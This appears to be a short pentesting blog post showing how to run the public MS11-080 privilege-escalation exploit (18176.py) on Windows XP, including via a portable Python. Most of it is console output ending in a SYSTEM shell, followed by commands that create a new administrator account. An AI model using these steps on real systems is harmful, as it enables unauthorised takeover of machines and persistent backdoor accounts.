So you’ve got access to a box but it’s only as a local user and you want SYSTEM like most people, step in 18176.py. As this code was written in python you’ll need a local copy of python on the box in order to priv up.

1
2
3
4
5
6
7
C:\Documents and Settings\user\Desktop>18176.py
Usage: 18176.py -O TARGET_OS
Options:
  -h, --help            show this help message and exit
  -O TARGET_OS, --target-os=TARGET_OS
                        Target OS. Accepted values: XP, 2K3
C:\Documents and Settings\user\Desktop>

My first attempt was with python version 3.2.2. and for some reason the code kept failing.

1
2
3
4
5
6
C:\Documents and Settings\user\Desktop>18176.py
  File "C:\Documents and Settings\Administrator\Desktop\18176.py", line 56
    print "[+] Retrieving %s info..." % drvname
                                    ^
SyntaxError: invalid syntax
C:\Documents and Settings\user\Desktop>

Python version 2.7 seemed to work just fine 🙂

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
C:\Documents and Settings\user\Desktop>net user newadmin /add
System error 5 has occurred.
Access is denied.
C:\Documents and Settings\user\Desktop>18176.py -O XP
[>] MS11-080 Privilege Escalation Exploit
[>] Matteo Memelli - ryujin@offsec.com
[>] Release Date 28/11/2011
[+] Retrieving Kernel info...
[+] Kernel version: ntkrnlpa.exe
[+] Kernel base address: 0x804d7000L
[+] HalDispatchTable address: 0x8054d038L
[+] Retrieving hal.dll info...
[+] hal.dll base address: 0x806e5000L
[+] HaliQuerySystemInformation address: 0x806fbbbaL
[+] HalpSetSystemInformation address: 0x806fe436L
[*] Triggering AFDJoinLeaf pointer overwrite...
[*] Spawning a SYSTEM shell...
C:\WINDOWS\system32>

And now for the quick new user 🙂

1
2
3
4
5
6
7
8
9
10
11
12
C:\WINDOWS\system32>net user newadmin Secret01 /add
The command completed successfully.
C:\WINDOWS\system32>net localgroup Administrators newadmin /add
The command completed successfully.
C:\WINDOWS\system32>net user
User accounts for \\
------------------------------------------------------------------
Administrator            ASPNET                   Guest
HelpAssistant            newadmin                 SUPPORT_388945a0
user
The command completed with one or more errors.
C:\WINDOWS\system32>

I got thinking, yeah I could attempt to rewrite this exploit in another language but that’s way past my skill level and available time. So what about a portable version of python? Step in PortablePython! The download is 45MB and once extracted it’s 222MB. Then it’s just a simple case of pointing the python.exe at the code 🙂

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
C:\Documents and Settings\user\Desktop>PortablePy\App\python.exe 18176.py -O XP
[>] MS11-080 Privilege Escalation Exploit
[>] Matteo Memelli - ryujin@offsec.com
[>] Release Date 28/11/2011
[+] Retrieving Kernel info...
[+] Kernel version: ntkrnlpa.exe
[+] Kernel base address: 0x804d7000L
[+] HalDispatchTable address: 0x8054d038L
[+] Retrieving hal.dll info...
[+] hal.dll base address: 0x806e5000L
[+] HaliQuerySystemInformation address: 0x806fbbbaL
[+] HalpSetSystemInformation address: 0x806fe436L
[*] Triggering AFDJoinLeaf pointer overwrite...
[*] Spawning a SYSTEM shell...
C:\WINDOWS\system32>net user newuser Secret01 /add
The command completed successfully.
C:\WINDOWS\system32>

It would be nice to see how much I could strip out of the portable version in order to decrease it’s size, but then that’s just something else for a rainy day.

How long before this is written in powershell or added to meterpreter’s getsystem code?

Leave a Reply